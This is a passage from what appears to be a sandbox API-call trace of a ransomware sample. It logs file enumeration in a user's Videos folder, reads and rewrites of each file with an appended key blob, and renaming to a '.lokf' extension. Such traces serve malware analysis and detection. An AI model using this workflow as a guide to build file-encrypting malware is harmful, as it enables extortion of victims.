hHeap=0x660000) returned 1 [0060.630] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3201228 | out: hHeap=0x660000) returned 1 [0060.630] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257198 | out: hHeap=0x660000) returned 1 [0060.630] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f908 | out: hHeap=0x660000) returned 1 [0060.630] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85f38 | out: hHeap=0x660000) returned 1 [0060.630] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c897a8 | out: hHeap=0x660000) returned 1 [0060.630] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0060.630] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f6f8 | out: hHeap=0x660000) returned 1 [0060.630] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261528 | out: hHeap=0x660000) returned 1 [0060.630] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32452d8 | out: hHeap=0x660000) returned 1 [0060.630] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242688 | out: hHeap=0x660000) returned 1 [0060.631] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0060.631] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32425c8 | out: hHeap=0x660000) returned 1 [0060.631] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32964a0 | out: hHeap=0x660000) returned 1 [0060.631] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0060.631] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0060.631] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32995a0 | out: hHeap=0x660000) returned 1 [0060.631] WriteFile (in: hFile=0x5cc, lpBuffer=0x9c8bae8*, nNumberOfBytesToWrite=0x76df, lpNumberOfBytesWritten=0x9f4fb14, lpOverlapped=0x0 | out: lpBuffer=0x9c8bae8*, lpNumberOfBytesWritten=0x9f4fb14*=0x76df, lpOverlapped=0x0) returned 1 [0060.631] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c8bae8 | out: hHeap=0x660000) returned 1 [0060.631] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x76e4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.631] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f4e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f4e8*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0060.631] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f4e8 | out: hHeap=0x660000) returned 1 [0060.631] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bba0 [0060.631] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x428) returned 0x326a370 [0060.631] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", cchWideChar=-1, lpMultiByteStr=0x326a370, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", lpUsedDefaultChar=0x0) returned 41 [0060.631] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x430) returned 0x32947b0 [0060.631] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a370 | out: hHeap=0x660000) returned 1 [0060.631] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329bba0 | out: hHeap=0x660000) returned 1 [0060.631] WriteFile (in: hFile=0x5cc, lpBuffer=0x32947b0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x32947b0*, lpNumberOfBytesWritten=0x9f4fb50*=0x28, lpOverlapped=0x0) returned 1 [0060.632] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0060.632] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0060.632] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0060.632] CloseHandle (hObject=0x5cc) returned 1 [0060.635] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290398 [0060.635] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8c0) returned 0x3268798 [0060.635] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3290398 | out: hHeap=0x660000) returned 1 [0060.635] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\m Cm9nOn1JJtRb93m\\YGVwuDjMl2Ykk_YA8hkk.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\27nf\\m cm9non1jjtrb93m\\ygvwudjml2ykk_ya8hkk.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\m Cm9nOn1JJtRb93m\\YGVwuDjMl2Ykk_YA8hkk.flv.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\27nf\\m cm9non1jjtrb93m\\ygvwudjml2ykk_ya8hkk.flv.lokf")) returned 1 [0060.635] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0060.635] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0060.635] VirtualFree (lpAddress=0x3700000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.636] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3228c60 | out: hHeap=0x660000) returned 1 [0060.636] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fdfa0a0, ftCreationTime.dwHighDateTime=0x1d4ca2e, ftLastAccessTime.dwLowDateTime=0xfb8ab040, ftLastAccessTime.dwHighDateTime=0x1d4c76d, ftLastWriteTime.dwLowDateTime=0xfb8ab040, ftLastWriteTime.dwHighDateTime=0x1d4c76d, nFileSizeHigh=0x0, nFileSizeLow=0x76e4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YGVwuDjMl2Ykk_YA8hkk.flv", cAlternateFileName="YGVWUD~1.FLV")) returned 0 [0060.636] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0060.637] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32575c0 | out: hHeap=0x660000) returned 1 [0060.637] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8720 | out: hHeap=0x660000) returned 1 [0060.637] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0060.637] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32696d0 [0060.637] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0060.637] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269b08 [0060.637] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.637] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.637] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269b08 | out: hHeap=0x660000) returned 1 [0060.637] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269b08 [0060.637] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.637] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.637] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269b08 | out: hHeap=0x660000) returned 1 [0060.637] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269b08 [0060.637] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.637] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.637] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269b08 | out: hHeap=0x660000) returned 1 [0060.637] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269b08 [0060.637] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.637] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.637] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269b08 | out: hHeap=0x660000) returned 1 [0060.637] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269b08 [0060.637] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.637] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.637] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269b08 | out: hHeap=0x660000) returned 1 [0060.637] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269b08 [0060.637] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0060.637] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.637] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269b08 | out: hHeap=0x660000) returned 1 [0060.637] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269b08 [0060.637] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.638] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x9c778e8 [0060.638] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.638] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0060.638] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269b08 | out: hHeap=0x660000) returned 1 [0060.638] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269b08 [0060.638] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.638] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.638] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269b08 | out: hHeap=0x660000) returned 1 [0060.638] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269b08 [0060.638] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0060.638] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.638] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269b08 | out: hHeap=0x660000) returned 1 [0060.638] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269b08 [0060.638] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0060.638] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0060.638] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269b08 | out: hHeap=0x660000) returned 1 [0060.638] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269b08 [0060.638] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0060.638] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0060.638] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269b08 | out: hHeap=0x660000) returned 1 [0060.638] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269b08 [0060.638] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.638] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.638] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269b08 | out: hHeap=0x660000) returned 1 [0060.638] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269b08 [0060.638] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.638] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.638] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269b08 | out: hHeap=0x660000) returned 1 [0060.638] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269b08 [0060.638] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0060.638] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.638] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269b08 | out: hHeap=0x660000) returned 1 [0060.638] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269b08 [0060.638] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0060.638] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.639] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269b08 | out: hHeap=0x660000) returned 1 [0060.639] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269b08 [0060.639] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.639] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.639] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269b08 | out: hHeap=0x660000) returned 1 [0060.639] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269b08 [0060.639] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.639] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.639] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269b08 | out: hHeap=0x660000) returned 1 [0060.639] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269b08 [0060.639] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.639] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.639] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269b08 | out: hHeap=0x660000) returned 1 [0060.639] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269b08 [0060.639] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.639] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.639] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269b08 | out: hHeap=0x660000) returned 1 [0060.639] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269b08 [0060.639] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.639] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.639] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269b08 | out: hHeap=0x660000) returned 1 [0060.639] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269b08 [0060.639] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.639] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.639] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269b08 | out: hHeap=0x660000) returned 1 [0060.639] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269b08 [0060.639] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.639] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.639] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269b08 | out: hHeap=0x660000) returned 1 [0060.639] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269b08 [0060.639] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.639] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0060.639] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.639] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0060.640] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269b08 | out: hHeap=0x660000) returned 1 [0060.640] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269b08 [0060.640] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.640] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.640] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269b08 | out: hHeap=0x660000) returned 1 [0060.640] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269b08 [0060.640] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.640] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x9c778e8 [0060.640] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.640] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0060.640] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269b08 | out: hHeap=0x660000) returned 1 [0060.640] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269b08 [0060.640] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0060.640] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0060.640] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269b08 | out: hHeap=0x660000) returned 1 [0060.640] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269b08 [0060.640] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0060.640] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0060.640] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269b08 | out: hHeap=0x660000) returned 1 [0060.640] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269b08 [0060.640] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.640] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.640] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269b08 | out: hHeap=0x660000) returned 1 [0060.640] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269b08 [0060.640] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.640] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.640] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269b08 | out: hHeap=0x660000) returned 1 [0060.640] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269b08 [0060.640] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.640] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0060.640] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.640] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0060.640] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269b08 | out: hHeap=0x660000) returned 1 [0060.640] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269b08 [0060.641] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0060.641] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.641] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269b08 | out: hHeap=0x660000) returned 1 [0060.641] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269b08 [0060.641] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0060.641] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.641] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269b08 | out: hHeap=0x660000) returned 1 [0060.641] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269b08 [0060.641] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.641] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.641] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269b08 | out: hHeap=0x660000) returned 1 [0060.641] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\XeSTpd\\") returned="XeSTpd\\" [0060.641] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\") returned="27nF\\" [0060.641] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="Videos\\" [0060.641] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0060.641] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0060.641] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0060.641] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0060.641] PathFindFileNameW (pszPath="") returned="" [0060.641] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\XeSTpd\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x43e2de00, ftCreationTime.dwHighDateTime=0x1d4c938, ftLastAccessTime.dwLowDateTime=0x272a63c0, ftLastAccessTime.dwHighDateTime=0x1d4cd0f, ftLastWriteTime.dwLowDateTime=0x272a63c0, ftLastWriteTime.dwHighDateTime=0x1d4cd0f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0060.641] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269b08 | out: hHeap=0x660000) returned 1 [0060.641] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x43e2de00, ftCreationTime.dwHighDateTime=0x1d4c938, ftLastAccessTime.dwLowDateTime=0x272a63c0, ftLastAccessTime.dwHighDateTime=0x1d4cd0f, ftLastWriteTime.dwLowDateTime=0x272a63c0, ftLastWriteTime.dwHighDateTime=0x1d4cd0f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.641] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x931ac6b0, ftCreationTime.dwHighDateTime=0x1d4ca35, ftLastAccessTime.dwLowDateTime=0xc937db40, ftLastAccessTime.dwHighDateTime=0x1d4c727, ftLastWriteTime.dwLowDateTime=0xc937db40, ftLastWriteTime.dwHighDateTime=0x1d4c727, nFileSizeHigh=0x0, nFileSizeLow=0xd7f5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HBgjb_CwGZsxIo486q.avi", cAlternateFileName="HBGJB_~1.AVI")) returned 1 [0060.642] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\XeSTpd\\HBgjb_CwGZsxIo486q.avi") returned=".avi" [0060.642] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\XeSTpd\\HBgjb_CwGZsxIo486q.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\27nf\\xestpd\\hbgjb_cwgzsxio486q.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0060.642] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=55285) returned 1 [0060.642] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0060.644] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xd7cf, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.644] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0060.645] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0xd7f5, lpOverlapped=0x0) returned 1 [0060.645] lstrlenA (lpString="-----BEGIN PUBLIC 